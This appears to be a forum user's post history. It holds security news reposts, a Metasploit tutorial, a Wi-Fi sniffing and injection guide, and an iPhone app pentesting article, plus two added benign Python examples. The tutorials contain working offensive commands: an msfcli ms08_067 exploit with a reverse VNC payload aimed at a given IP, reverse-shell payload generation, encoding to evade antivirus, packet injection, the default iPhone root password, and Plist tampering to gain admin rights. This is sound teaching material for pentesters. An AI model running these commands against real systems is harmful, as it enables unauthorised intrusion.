Wubi
Everything posted by Wubi
-
Obama will control internet, signs Emergency Internet Control
Posted On 7/18/2012 12:36:00 AM By THN Security Analyst

Barack Obama has signed an executive order that could hand control of the internet to the U.S. Government, in the event of a natural disaster or terrorist attack. "The federal government must have the ability to communicate at all times and under all circumstances to carry out its most critical and time sensitive missions," Obama said.

President Obama adds that it is necessary for the government to be able to reach anyone in the country during situations it considers critical, writing, "Such communications must be possible under all circumstances to ensure national security, effectively manage emergencies and improve national resilience." Later the president explains that such could be done by establishing a "joint industry-Government center that is capable of assisting in the initiation, coordination, restoration and reconstitution of NS/EP [national security and emergency preparedness] communications services or facilities under all conditions of emerging threats, crisis or emergency."

But Section 5.2 has raised alarm among those who fear the government will have too much control over the Web. The section explained how the secretary of homeland security - currently Janet Napolitano - will 'satisfy priority communications requirements through the use of commercial, Government, and privately owned communications resources, when appropriate.'

White House officials have acted quickly to ease concern, insisting the order is just an update of an existing authority dating back to 1984. They claim the government has been granted no extra powers. How threatening Obama's new executive powers are is subject to debate. Please pass your feedback in Comments.

Obama will control internet, signs Emergency Internet Control : The Hacker News ~ http://thehackernews.com/2012/07/obama-will-control-internet-signs.html
-
Metasploit terms
MSFconsole
MSFcli
Armitage
MSFpayload
MSFencode

Metasploit is a valuable pen testing tool that can get quite confusing for a beginner. This Metasploit tutorial will help you get Metasploit running. Most of your targets will probably be systems running Windows. If you are interested, I recommend reading Amazon.com: Metasploit: The Penetration Tester's Guide (9781593272883): David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni: Books, a book that will show you most of the Metasploit framework and lets you discover the real "power" of Metasploit on your own. Either way, I really recommend it.

1. Metasploit terms
Exploit - taking advantage of a security flaw in a system, network or application.
Payload - the code the victim's computer will execute within the Metasploit framework.
Module - a small piece of code that can be added to the Metasploit framework to carry out an attack.
Shellcode - a small piece of code used as a payload.

2. MSFConsole
Msfconsole is an interface to most of Metasploit's features. Msfconsole can be used to launch attacks, create "listeners", and much, much more. We will use Msfconsole throughout this tutorial. Metasploit comes installed by default on BackTrack 5. To access msfconsole, open a terminal and type:
root@bt:~# cd /opt/metasploit/msf3
root@bt:/opt/metasploit/msf3# msfconsole
If you need help, to see the "help" files, simply type help followed by the command you want to learn more about. In our case, we want to learn more about the connect command. It lets us communicate with a host.
msf > help connect

3. MSFcli
MSFcli is another way to access the Metasploit framework, but it focuses more on scripting and interpretability. To see more about msfcli:
root@bt:~# cd /opt/metasploit/msf3
root@bt:/opt/metasploit/msf3# msfcli -h
Now let's give msfcli a little "test drive". You can see a module's options by adding the letter O at the end of the line. For example:
root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapi O
This module needs 3 options: RHOST, RPORT and SMBPIPE. Adding P at the end lets us see which payloads we can use.
root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapi RHOST=184.22.212.191 P
We can run our exploit by selecting a payload, filling in the options, and running it by putting the letter E at the end of the msfcli argument string.
root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapi RHOST=184.22.212.191 PAYLOAD=windows/vncinject/reverse_tcp_dns E
Note: the IP selected as RHOST is a VPS running Windows Server. It will act as the victim system, for testing. You will have to do the same, with another computer or a virtual machine. For "practice", do not update the victim system and do not install an antivirus.

4. Armitage
1. Run the armitage command
2. Select Start MSF. It has a GUI.

5. MSFpayload
The msfpayload component of Metasploit generates shellcode and executables. Shellcode can be generated in several forms such as C, Ruby, JavaScript and even Visual Basic. Each of these can be useful in different situations. For help with msfpayload you can type:
root@bt:~# msfpayload -h
As with msfcli, if you need to find the required options, put the letter O at the end of the line.
root@bt:~# msfpayload windows/shell_reverse_tcp O

6. MSFencode
The shellcode generated by msfpayload is functional, but it contains a lot of null characters which, when interpreted by most programs, signify the end of a string, and that will cause the code to terminate before compilation. In addition, the shellcode crosses the network in cleartext, which can be picked up by intrusion detection systems (IDSs) and antivirus programs. For this problem, the Metasploit developers offer msfencode, which helps you avoid the bad characters and evade the antivirus and IDS by encoding the original payload in such a way that it does not contain "bad" characters. Type msfencode -h for a list of msfencode options. Metasploit contains a number of different encoders for different situations. Some will be useful when you can only use alphanumeric characters as part of the payload, as is the case with many file formats or other applications that accept only printable characters as input. A very popular and well known encoder is x86/shikata_ga_nai. For a list of available encoders, type:
root@bt:~# msfencode -l

References
Main Page - BackTrack Linux
BackTrack Tutorials
-
Packet Sniffing and Injecting

WLAN frames:
Management frames: Management frames are responsible for maintaining communication between access points and wireless clients.
Control frames: Control frames are responsible for maintaining a proper exchange of data between the access point and wireless clients.
Data frames: Carry the actual data sent over the wireless network. There are no sub-types for data frames.

Packet Sniffing using Wireshark
Open Wireshark from the menu, or type "wireshark" in a console. In the menu you can find it under Application>BackTrack>Information Gathering>Network Analysis>Network Traffic Analysis>wireshark. Once Wireshark has opened, click on "Interface List". Another window will open with a list of interfaces that can capture packets. Note: I set it to mon0. Click on start, and Wireshark will begin capturing packets. Those are the wireless packets that the wireless card is sniffing. Now let's look at the packets from our own access point. To do that, we will use airodump-ng. Airodump-ng is used to capture wireless packets that use WEP encryption, with the idea that you will use aircrack-ng (I will cover it in a tutorial another time). But, this time, let's disable the encryption on our access point. Now go to the terminal and type:
airodump-ng --bssid 00:D9:98:6A:85:b0 mon0
Note: 00:D9:98:6A:85:b0 is the MAC address of my access point. To find yours, in the terminal:
ifconfig -a
After airodump-ng finishes, you will see your access point with the channel it is running on. Now we need to lock onto our access point by setting the wireless card to the access point's channel. For that:
root@bt:~# iwconfig mon0 channel 6
(where "6" is the access point's channel). Now back to Wireshark. Type in the filter box:
(wlan.bssid == YOUR MAC ADDRESS) && (wlan.fc.type_subtype == 0x20)
Now we will "sniff" only the packets from our access point.

Packet Injecting
First, we want to see only the non-beacon packets in Wireshark. So open Wireshark and type in the filter box:
(wlan.bssid == YOUR MAC ADDRESS) && !(wlan.fc.type_subtype == 0x08)
Then open the terminal and type:
aireplay-ng -9 -e "Wubi" -a YOUR MAC ADDRESS mon0
Note: replace Wubi with the name of your SSID. Now, if you go back to Wireshark, you should see a few packets that were injected. Those are just random packets that have no real effect.

References
Main Page - BackTrack Linux
BackTrack Tutorials
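To show what the two Wireshark filters in the post actually test for, here is an added Python example (not part of the tutorial) that decodes the 802.11 frame control field and the BSSID from raw frame headers and applies the same conditions to a constructed capture; the client and neighbouring-AP MAC addresses are made up, the access point MAC is the one from the post.

```python
"""Apply the post's two Wireshark-style filters to raw 802.11 frame headers.

wlan.fc.type_subtype is (type << 4) | subtype: 0x08 is a beacon (management,
subtype 8) and 0x20 is a plain data frame (data, subtype 0).  The BSSID sits in
a different address slot depending on the To DS / From DS bits, which is what
Wireshark's wlan.bssid field resolves for you.  Added example; capture is constructed.
"""
from typing import Dict, List, Optional

BEACON = 0x08          # wlan.fc.type_subtype of a beacon frame
DATA = 0x20            # wlan.fc.type_subtype of a plain data frame
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_frame(ftype: int, subtype: int, addr1: str, addr2: str, addr3: str,
                to_ds: bool = False, from_ds: bool = False) -> bytes:
    """Build a minimal 802.11 MAC header (no body or FCS) for the constructed capture."""
    fc0 = (ftype << 2) | (subtype << 4)             # protocol version 0, type, subtype
    fc1 = (1 if to_ds else 0) | (2 if from_ds else 0)
    duration = b"\x00\x00"
    seq_ctrl = b"\x00\x00"
    return (bytes([fc0, fc1]) + duration + mac_to_bytes(addr1)
            + mac_to_bytes(addr2) + mac_to_bytes(addr3) + seq_ctrl)


def parse_frame(frame: bytes) -> Dict[str, Optional[object]]:
    """Decode frame control and pick the BSSID address slot from the DS bits."""
    fc0, fc1 = frame[0], frame[1]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    to_ds, from_ds = bool(fc1 & 0x1), bool(fc1 & 0x2)
    addr1 = bytes_to_mac(frame[4:10])
    addr2 = bytes_to_mac(frame[10:16])
    addr3 = bytes_to_mac(frame[16:22])
    if not to_ds and not from_ds:
        bssid = addr3          # management frames and ad-hoc data
    elif to_ds and not from_ds:
        bssid = addr1          # station -> access point
    elif from_ds and not to_ds:
        bssid = addr2          # access point -> station
    else:
        bssid = None           # 4-address WDS frame: no single BSSID
    return {"type_subtype": (ftype << 4) | subtype, "bssid": bssid,
            "addr1": addr1, "addr2": addr2, "addr3": addr3}


def filter_frames(frames: List[bytes], bssid: str,
                  type_subtype: Optional[int] = None,
                  exclude_type_subtype: Optional[int] = None) -> List[bytes]:
    """(wlan.bssid == bssid) && (type_subtype == T)  or  && !(type_subtype == T)."""
    kept = []
    for frame in frames:
        info = parse_frame(frame)
        if info["bssid"] != bssid.lower():
            continue
        if type_subtype is not None and info["type_subtype"] != type_subtype:
            continue
        if exclude_type_subtype is not None and info["type_subtype"] == exclude_type_subtype:
            continue
        kept.append(frame)
    return kept


def data_from_my_ap(frames: List[bytes]) -> List[bytes]:
    """The first filter in the post: only data frames belonging to our AP."""
    return filter_frames(frames, MY_AP, type_subtype=DATA)


def non_beacons_from_my_ap(frames: List[bytes]) -> List[bytes]:
    """The second filter in the post: everything from our AP except beacons."""
    return filter_frames(frames, MY_AP, exclude_type_subtype=BEACON)


MY_AP = "00:d9:98:6a:85:b0"       # access point MAC from the post
OTHER_AP = "02:11:22:33:44:55"    # constructed neighbouring access point
CLIENT = "02:aa:bb:cc:dd:ee"      # constructed wireless client
DEST = "02:01:02:03:04:05"        # constructed final destination behind the AP

# Constructed capture: beacons from two APs, data in both directions on our AP,
# a probe request (BSSID is broadcast) and a QoS data frame (type_subtype 0x28).
SAMPLE_CAPTURE = [
    build_frame(0, 8, BROADCAST, MY_AP, MY_AP),                 # beacon, our AP
    build_frame(0, 8, BROADCAST, MY_AP, MY_AP),                 # beacon, our AP
    build_frame(0, 8, BROADCAST, OTHER_AP, OTHER_AP),           # beacon, neighbour
    build_frame(2, 0, MY_AP, CLIENT, DEST, to_ds=True),         # data, client -> our AP
    build_frame(2, 0, CLIENT, MY_AP, DEST, from_ds=True),       # data, our AP -> client
    build_frame(0, 4, BROADCAST, CLIENT, BROADCAST),            # probe request
    build_frame(2, 8, CLIENT, MY_AP, DEST, from_ds=True),       # QoS data, our AP -> client
]

if __name__ == "__main__":
    print("data frames from our AP:", len(data_from_my_ap(SAMPLE_CAPTURE)))
    print("non-beacon frames from our AP:", len(non_beacons_from_my_ap(SAMPLE_CAPTURE)))
```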
-
Decrypt this: 95cedfbe9c3f11cfc59187ee12ddc5111b4e1895
Encrypted in MD5>Base64>SHA1.
-
Android Security shielded with full ASLR implementation Posted On 7/17/2012 11:49:00 PM By THN Security Analyst The latest release of Google's Android mobile operating system has finally been properly fortified with an industry-standard defense. It's designed to protect end users against hack attacks that install malware on handsets. Android 4.1 Jelly Bean includes several new exploit mitigations and a more extensive implementation of ASLR to help defeat many kinds of exploits. ASLR is an exploit mitigation method that randomizes the positions of key data areas such as libraries, heap, stack, and the base... Android Security shielded with full ASLR implementation : The Hacker News ~ http://thehackernews.com/2012/07/android-security-shielded-with-full.html
-
In the first part of this thread, we discussed the iPhone application traffic analysis. In this part, we will take a look at the privacy issues and the application local data storage.

Privacy issues
Every iPhone has an associated unique device identifier derived from a set of hardware attributes, called UDID. UDID is burned into the device and one cannot remove or change it. However, it can be spoofed with the help of tools like UDID Faker. UDID of the latest iPhone is computed with the formula given below -
UDID = SHA1(Serial Number + ECID + LOWERCASE(WiFi Address) + LOWERCASE(Bluetooth Address))
UDID is exposed to application developers through an API which would allow them to access the UDID of an iPhone without requiring the device owner's permission. The code snippet shown below is used to collect the UDID of a device, which can later be used to track the user's behavior.
NSString *uniqueIdentifier = [device uniqueIdentifier];
Current research shows that, with the help of UDID, it is possible to observe the user's browsing patterns and trace out the user's geo location. As it is possible to locate the user's exact location with the help of a device UDID, it became a big privacy concern. More possible attacks are documented in Eric Smith's iPhone application privacy issues whitepaper. Eric's research shows that 68% of applications silently send UDIDs to the servers on the internet. A perfect example of a serious privacy security breach is the social gaming network OpenFeint. OpenFeint collected device UDIDs and misused them by linking them to real world user identities (like email address, geo location latitude & longitude, Facebook profile picture) and making them available for public access, resulting in a serious privacy breach. More details about this security breach are documented at this link.

While penetration testing, observe the network traffic for UDID transmission. UDID in the network traffic indicates that the application is collecting the device identifier or might be sending it to a third party analytic company to track the user's behaviour. In iOS 5, Apple has deprecated the API that gives access to the UDID, and it will probably remove the API completely in future iOS releases. Development best practice is not to use the API that collects the device UDIDs, as it breaches the privacy of the user. If the developers want to keep track of the user's behaviour, create a unique identifier specific to the application instead of using UDID. The disadvantage with the application specific identifier is that it only identifies an installation instance of the application, and it does not identify the device.

Apart from UDID, applications may transmit personally identifiable information like age, name, address and location details to third party analytic companies. Transmitting personally identifiable information to third party companies without the user's knowledge also violates the user's privacy. So, during penetration testing carefully observe the network traffic for the transmission of any important data. Example: the Pandora application used to transmit the user's age and zip code to a third party analytic company (doubleclick.net) in clear text. For the applications which require the user's geo location (ex: check-in services) to serve the content, it is always recommended to use the least degree of accuracy necessary. This can be achieved with the help of accuracy constants defined in the Core Location framework (ex: CLLocationAccuracy kCLLocationAccuracyNearestTenMeters).

Local data storage
Mobile applications store data locally on the device to maintain essential information across application executions, or for better performance or offline access. Also, developers use the local device storage to store information such as user preferences and application configurations. As device theft is becoming an increasing concern, especially in the enterprise, insecure local storage is considered to be the top risk in mobile application threats. A recent survey conducted by viaForensics revealed that 76 percent of mobile applications are storing the user's information on the device. 10 percent of them are even storing plain text passwords on the phone. Sensitive information stored on the iPhone can be obtained by attackers in several ways. A few of the ways are listed below -

From Backups
When an iPhone is connected to iTunes, iTunes automatically takes a backup of everything on the device. Upon backup, sensitive files will also end up on the workstation. So an attacker who gets access to the workstation can read the sensitive information from the stored backup files.

Physical access to the device
People lose their phones and phones get stolen very easily. In both cases, an attacker will get physical access to the device and read the sensitive information stored on the phone. The passcode set on the device will not protect the information as it is possible to brute force the iPhone simple passcode within 20 minutes. To know more details about iPhone passcode bypass, go through the iPhone Forensics article available at - InfoSec Resources - iPhone Forensics.

Malware
Leveraging a security weakness in iOS may allow an attacker to design malware which can steal the files on the iPhone remotely. Practical attacks are demonstrated by Eric Monti in his presentation "iPhone Rootkit? There's an App for That!".

iPhone application directory structure:
In iOS, applications are treated as a bundle represented within a directory. The bundle groups all the application resources, binaries and other related files into a directory. On the iPhone, applications are executed within a jailed environment (sandbox or seatbelt) with mobile user privileges. Unlike Android's UID based segregation, iOS applications run as one user. Apple says "The sandbox is a set of fine-grained controls limiting an application's access to files, preferences, network resources, hardware, and so on. Each application has access to the contents of its own sandbox but cannot access other applications' sandboxes. When an application is first installed on a device, the system creates the application's home directory, sets up some key subdirectories, and sets up the security privileges for the sandbox". A sandbox is a restricted environment that prevents applications from accessing unauthorized resources; however, upon iPhone JailBreak, sandbox protection gets disabled. When an application is installed on the iPhone, it creates a directory with a unique identifier under the /var/mobile/Applications directory. Everything that is required for an application to execute will be contained in the created home directory. The typical iPhone application home directory structure is listed below. On the iPhone, applications might store information in any of the locations listed below.
Plist files
Keychain
Application's home directory
Cache
Logs

Plist files:
A Property List is a structured binary formatted file which contains the essential configuration of a bundle executable in nested key value pairs. Plist files are used to store the user preferences and the configuration information of an application. For example, gaming applications usually store game levels and game scores in Plist files. In general, applications store the Plist files under the [Application's Home Directory]/documents/preferences folder. A Plist can either be in XML format or in binary format. As XML files are not the most efficient means of storage, most applications use binary formatted Plist files. Binary formatted data stored in Plist files can be easily viewed or modified using Plist editors (ex: plutil). Plist editors convert the binary formatted data into XML formatted data, which can then be edited easily.

Plist files are primarily designed to store user preferences & application configuration; however, applications may use Plist files to store clear text usernames, passwords and session related information. So, while penetration testing, view all the Plist files available under the application's home directory and look for sensitive information, like usernames, passwords, the user's personal information and session cookies, etc. Developers can assign any extension to the Plist files. A Plist file can be easily identified by looking at the file contents using the cat command. The content of a binary Plist file starts with 'bplist'. Along with the sensitive information storage, applications may also take authentication & authorization decisions based on the values stored in Plist files. For example, if you notice a Plist entry like admin=0 during penetration testing, change the admin key value to 1 and open the application. If the application does not validate the user input properly and takes the authorization decision based on the Plist entry, you may log into the application as an administrator. Development best practice is to not store any sensitive information in Plist files. Also, do not take authentication & authorization decisions based on the information stored in Plist files. Plist files contain user controlled input, and it should be validated properly like any other user input.

The WordPress iPhone application used to store the clear text username and password in a Plist file. The video below demonstrates the WordPress vulnerability. This vulnerability was reported by SANS and WordPress fixed it immediately. Plist files can be viewed and modified easily on both JailBroken and non JailBroken iPhones. The examples listed below illustrate the various ways of editing Plist files on both JailBroken and non JailBroken devices.

Tampering Plist files on a non JailBroken iPhone:
On a non JailBroken iPhone, Plist files can be viewed & modified using tools like iExplorer and iBackupBot.

Modifying Plist entries with iExplorer
iExplorer (formerly iPhone Explorer) gives access to the iPhone in disk mode and allows browsing all the folders on the iPhone directly. The Stick Cricket iPhone game is used for the demo. The Stick Cricket iPhone game stores the game score in a Plist file under the application's home directory. As the application is storing the game score locally in a Plist file, it can be altered by editing the Plist file. The screenshot shown below displays the actual score before the Plist modification. The steps shown below demonstrate the usage of the iExplorer tool to modify the game scores stored in the Plist file -
1. On your workstation, download and install iExplorer.
2. Connect the iPhone to the workstation over USB.
3. In iExplorer, browse to the Apps->com.sticksports.stickcricket folder.
4. Navigate to the Stick Cricket Library->Preferences folder.
5. Copy the com.sticksports.stickcricket.plist file to the workstation by dragging it to the desktop.
6. On the workstation, open the Plist file using a Plist editor and modify the yourBest5Overs key value. For this demo, I have modified the value to 180 from 30 and saved the Plist file.
7. From iExplorer, delete com.sticksports.stickcricket.plist on the iPhone and drag the newly saved file onto the iPhone.
8. On the iPhone, terminate the Stick Cricket application and reopen it.
The Stick Cricket welcome screen now displays the modified score as shown in the screenshot below.

Modifying Plist entries with iBackupBot
When the iPhone is connected to a computer, iTunes takes a backup of everything on the phone including configuration files (Plist files). The iBackupBot tool can be used to view and modify the Plist file entries in the iPhone backup and restore the modified backup onto the iPhone. The steps shown below demonstrate the use of the iBackupBot tool to modify the game scores stored in the Plist file -
1. Connect the iPhone to the workstation over a USB cable.
2. On the workstation, open iTunes and take a backup of the iPhone. Close iTunes.
3. Open iBackupBot. It automatically identifies the existing backups and displays the files inside the backup to the user.
4. Click on Stick Cricket and open the /Library/Preferences/com.sticksports.stickcricket.plist file.
5. Modify the score stored in the Plist file. Click on the Export icon to save the modified Plist file.
6. Click the restore icon in the iBackupBot toolbar. It will restore the iPhone with the modified backup.
Now, on the iPhone, reopening the Stick Cricket game will display the modified score.

Tampering Plist files on a JailBroken iPhone:
On a JailBroken iPhone, Plist files can be viewed & modified using tools like plutil and iFile. Both these tools can be downloaded from Cydia (packages - com.eric.tool & iFile). iFile allows modifying the Plist files directly on the iPhone. The iPhone camera application is used for the demo. In the iOS camera application, Apple has hidden the panorama mode feature and planned to include this feature in future iOS versions. Panorama mode basically allows users to take continuous photos while panning the camera from left to right. Apple stored the panorama mode switch in a Plist file. iOS hackers Conard & Chpwn exposed the panorama mode in iOS 5 by modifying an entry in the com.apple.mobileslideshow.plist file. The screenshot shown below displays the list of options available in the iPhone camera application. The steps shown below demonstrate the usage of the plutil tool to change the panorama switch stored in the Plist file -
1. SSH to the iPhone and log in as the root user (password: alpine).
2. Navigate to the /private/var/mobile/Library/Preferences/ directory.
3. View the com.apple.mobileslideshow.plist file content with the help of the plutil tool.
> plutil com.apple.mobileslideshow.plist
4. Add the 'EnableFirebreak' key to the com.apple.mobileslideshow.plist file with the below command.
> plutil -key EnableFirebreak -value yes com.apple.mobileslideshow.plist
It turns on the panorama feature in the iPhone camera application. The screenshot below shows the different options available in the iPhone camera after the modification.

Penetration Testing for iPhone Applications is going to be covered in a series of articles. Part 3 will cover the keychain data storage and error log analysis.

References
InfoSec Resources
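As an added example (not from the article), the following Python script performs the Plist review described above on a constructed preferences file: it checks for the bplist magic, loads either the XML or the binary format with the standard plistlib module, and flags keys holding credentials, session data or client-side authorization decisions such as admin=0. The key-name patterns and the sample values are assumptions made for the example.

```python
"""Scan an application's Plist files for what the article tells a tester to look for:
clear-text credentials / session material and authorization flags stored client-side.

Added example, not part of the article; SAMPLE_PREFS is a constructed preferences file.
"""
import plistlib
import re
from typing import Any, List, Tuple

BPLIST_MAGIC = b"bplist"   # what `cat` shows at the start of a binary Plist

# Key names a tester flags on sight: credentials, session material, personal data.
# (Assumed patterns; extend them for the application under test.)
CREDENTIAL_KEY_RE = re.compile(
    r"pass(word|wd)?|secret|token|session|cookie|user(name)?|email|phone",
    re.IGNORECASE)
# Keys whose value an application might use to decide what the user may do (admin=0).
AUTHZ_KEY_RE = re.compile(r"admin|role|privilege|is_?premium|unlocked", re.IGNORECASE)

Finding = Tuple[str, str, Any]   # (reason, key path, value)


def is_binary_plist(data: bytes) -> bool:
    """The article's identification rule: binary Plist content starts with 'bplist'."""
    return data.startswith(BPLIST_MAGIC)


def load_plist(data: bytes) -> Any:
    """plistlib detects XML vs binary itself, so no plutil conversion is needed first."""
    return plistlib.loads(data)


def scan(node: Any, path: str = "") -> List[Finding]:
    """Walk nested dicts/lists and report every suspect key with its path and value."""
    findings: List[Finding] = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}/{key}" if path else str(key)
            if CREDENTIAL_KEY_RE.search(str(key)):
                findings.append(("credential or session data", child, value))
            elif AUTHZ_KEY_RE.search(str(key)) and isinstance(value, (bool, int, str)):
                findings.append(("client-side authorization flag", child, value))
            findings.extend(scan(value, child))     # recurse into nested containers
    elif isinstance(node, list):
        for i, item in enumerate(node):
            findings.extend(scan(item, f"{path}[{i}]"))
    return findings


def scan_plist_bytes(data: bytes) -> List[Finding]:
    """Load a Plist blob of either format and scan it."""
    return scan(load_plist(data))


# Constructed preferences in the spirit of the WordPress and admin=0 findings above.
SAMPLE_PREFS = {
    "lastOpened": "2012-07-18",
    "username": "alice",
    "password": "hunter2",                          # clear-text password
    "admin": 0,                                     # authorization decided from a Plist
    "session": {"cookie": "PHPSESSID=deadbeef"},    # session token persisted locally
    "yourBest5Overs": 30,                           # harmless game data, not flagged
}
SAMPLE_BINARY = plistlib.dumps(SAMPLE_PREFS, fmt=plistlib.FMT_BINARY)
SAMPLE_XML = plistlib.dumps(SAMPLE_PREFS, fmt=plistlib.FMT_XML)

if __name__ == "__main__":
    for name, blob in (("binary", SAMPLE_BINARY), ("xml", SAMPLE_XML)):
        print(f"{name}: starts with bplist magic = {is_binary_plist(blob)}")
        for reason, key, value in scan_plist_bytes(blob):
            print(f"  [{reason}] {key} = {value!r}")
```

Run it against files copied out of an application's home directory or an iTunes backup; anything it reports is a candidate for the "should not be stored here" finding.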
-
App Store bypassed by Russian hacker without jailbreaking
Wubi replied to Wubi's topic in Security news
Ah, I hadn't seen it. Someone delete this one then. -
This article focuses specifically on the techniques and tools that will help security professionals understand penetration testing methods for iPhone applications. It attempts to cover the entire application penetration testing methodology on a physical device (running with iOS 5) rather than a simulator. Background: Since the introduction of the iPhone, Apple has sold more than 110 million iPhones. The smartphone platform has created a new business and companies want to make their services available on mobile devices in order to reach out to users very quickly and easily. The iPhone has enough power and performance to do most of the stuff you can do on a laptop and span a range of categories from education and productivity to games and entertainment. The iPhone provides developers with a platform to develop two types of applications. Web based applications – which uses JavaScript, CSS and HTML-5 technologies Native iOS applications- which are developed using Objective-C and Cocoa touch API This article mainly covers the pen testing methodology of native iOS applications. However, some of the techniques explained here can also be used with web-based iOS applications. Application Distribution model: iOS developers use Apple Xcode developer tools and test their applications within the iOS simulator. A simulator simulates an environment but it does not mimic many of the features and functionalities available on real devices. An iOS simulator compiles iOS applications to a local native code which is different from the Android emulator that compiles to ARM instructions. Though simulators allow basic development and testing, it is not sufficient for many applications which require the use of full hardware power, performance and features which are only available on real devices. To test these types of applications on real devices, developers have to subscribe to Apple’s iOS Developer Program because the iPhone is only allowed to run Apple signed applications. 
Mandatory Code Signing mechanism implemented in iOS requires that all the native code running on the device should be signed by a known or trusted certificate. Upon subscription to the iOS Developers Program, Apple issues a signed provisioning profile that configures the iOS device to permit the execution of code signed by a developer certificate. Developers can apply for this program as an individual, company or university. Based on the provisioning profile, application distribution models are categorized as 5 types. Single device distribution: Development provisioning profiles issued by Apple are tied to a device’s UDID (Unique Device ID). This provisioning profile allows running a developer’s application on the device. As it is tied to a particular device, the provisioning profile does not work on other devices. This model is used during single device testing. Ad Hoc distribution: Ad Hoc provisioning profiles issued by Apple are tied to the UDID’s of up to 100 other devices, including the iPad, iPhone or iPod touch. The developer has to supply the UDID of 100 devices during the subscription process. This model allows developers to test their application on a wide range of devices. In-house distribution: Enterprise provisioning profiles issued by Apple permit the installation of applications on devices without configuring their UDIDs. This distribution is generally used by enterprises to distribute applications internally to their employees. Over the air (OTA) distribution: This model is designed to allow enterprise developers to send applications to individual users in their organization through e-mail or by hosting the application on a web server. The main problem with this kind of distribution is if someone outside the organization gets access to the link then they too can also install the application. App Store distribution This is a centralized mechanism for distributing Apple signed applications. 
Upon submitting the application to Apple, Apple verifies it against the App Store review guidelines and approves it if the application follows all the review guidelines. After approval, Apple will re-sign the application with an Apple signing certificate and make it available for download in the App Store. Penetration Testing In this section we are going to focus on iOS applications rather than the iPhone operating system itself. Actually there is an overlap between the iPhone OS security and the iPhone application security. So understanding the iOS platform and its security technology will help penetration testers properly assess the security of iPhone applications. The main areas of focus while assessing the security of iPhone applications are - Application traffic analysis Privacy Issues Local Data Storage Caching Reverse Engineering Unmanaged code URL Schemes Push Notifications Setup: A simulator does not provide the actual device environment, so all the penetration testing techniques explained in this article are specific to a physical device. iPhone 4 with iOS 5 will be used for the following demonstrations. To perform pentesting we need to install a few tools on our device. These tools are not approved by Apple. Code signing restrictions in iOS do not allow us to install the required tools on the device. To bypass the code signing restrictions and run our tools we have to JailBreak the iPhone. JailBreaking gives us full access to the device and allows us to run code which is not signed by Apple. After JailBreaking, the required unsigned applications can be downloaded from Cydia. Cydia is a parallel App Store for unsigned applications. JailBreaking puts your phone at great risk to some security vulnerabilities because the device allows any application to run even if it is not approved by Apple. Though we can assess the security of an application on a non-JailBroken iPhone, it is not possible to give complete coverage. 
Jailbreaking makes the pen tester's work easier and helps to provide full coverage of an application. Tools like Pwnage, redsn0w and greenpois0n can be used to jailbreak the iPhone.

Tools required for pentesting: from Cydia, download and install the applications listed below.
- OpenSSH: allows us to connect to the iPhone remotely over SSH
- Adv-cmds: comes with a set of process commands like ps, kill, finger...
- Sqlite3: SQLite database client
- GNU Debugger: for run-time analysis and reverse engineering
- Syslogd: to view iPhone logs
- Veency: allows viewing the phone on the workstation with the help of the Veency client
- Tcpdump: to capture network traffic on the phone
- com.ericasadun.utlities: plutil to view property list files
- Grep: for searching
- Odcctools: otool, the object file displaying tool
- Crackulous: decrypt iPhone apps
- Hackulous: to install decrypted apps

The iPhone does not give us a terminal to see inside directories. Upon OpenSSH installation on the device, we can connect to the SSH server on the phone from any SSH client (e.g. PuTTY, Cyberduck, WinSCP). This gives us the flexibility to browse through folders and execute commands on the iPhone. An iPhone has two users by default. One is mobile and the other is the root user. All the applications installed on the phone run with mobile user privileges. But using SSH we can log into the iPhone as the root user, which gives us full access to the device. The default password for both user accounts (root, mobile) is alpine. Note: best practice is to change the default SSH passwords of your device. If your phone and the workstation are connected to Wi-Fi, you can directly SSH to the iPhone by typing in the IP address and username/password.

SSH to iPhone over Wi-Fi:
> ssh root@iPhone-IP
> password: alpine

If your phone and the workstation are not on Wi-Fi, you can still SSH via the USB cable with the help of an iPhone tunnel (which can be downloaded from iphonetunnel-usbmuxconnectbyport - USB mux TCP tunneling and basic iRecovery functionality without libUSB - Google Project Hosting).

SSH to iPhone over USB cable:
> ./iphone_tunnel -Iport 2222
> ssh -p 2222 root@127.0.0.1

Once we have an SSH connection, we can run commands directly on the iPhone. As iOS is a trimmed version of Mac OS, many of the Mac OS commands will work on the iPhone.

Application traffic analysis

Pen testing iPhone applications isn't all that different, because client-side applications still interact with the server-side components over a network using some protocols. So it also involves network pentesting and web application pentesting. The primary goal in traffic analysis is to capture and analyze the network traffic to find vulnerabilities. iPhone applications may transmit data to the server using any of these communication mechanisms:
- Clear text transmission, such as http
- Encrypted channel, such as https
- Custom protocols or low level streams

It's 2012 and applications are still using clear text transmission protocols like http. In general, mobile applications are more prone to MITM attacks because most people access them over Wi-Fi. An attacker who has access to the same Wi-Fi can run tools like FireSheep and hijack user sessions. As plain text transport protocols are vulnerable to MITM attacks, applications which transmit sensitive data must use encrypted communication protocols like https. During pen testing, observe whether the application is transmitting any sensitive data over the encrypted channel or not. Application traffic can be captured by configuring the proxy settings available on the iPhone. Upon setting up a proxy, the iPhone routes its traffic through the configured proxy.

Configuring Proxy

The screenshots below illustrate the settings on an iPhone and workstation (IP 192.168.1.4) required to capture http application traffic.
1. Navigate to the Settings application
2. Turn on Wi-Fi
3. Choose a network and click on the blue arrow corresponding to it
4. Choose 'Manual' and set up a proxy IP (ex: 192.168.1.4)

1. On your workstation, open Burp Suite and navigate to Proxy -> Options, Edit proxy listeners: enter 'port' as 8080, disable 'loopback only' and select 'support invisible'

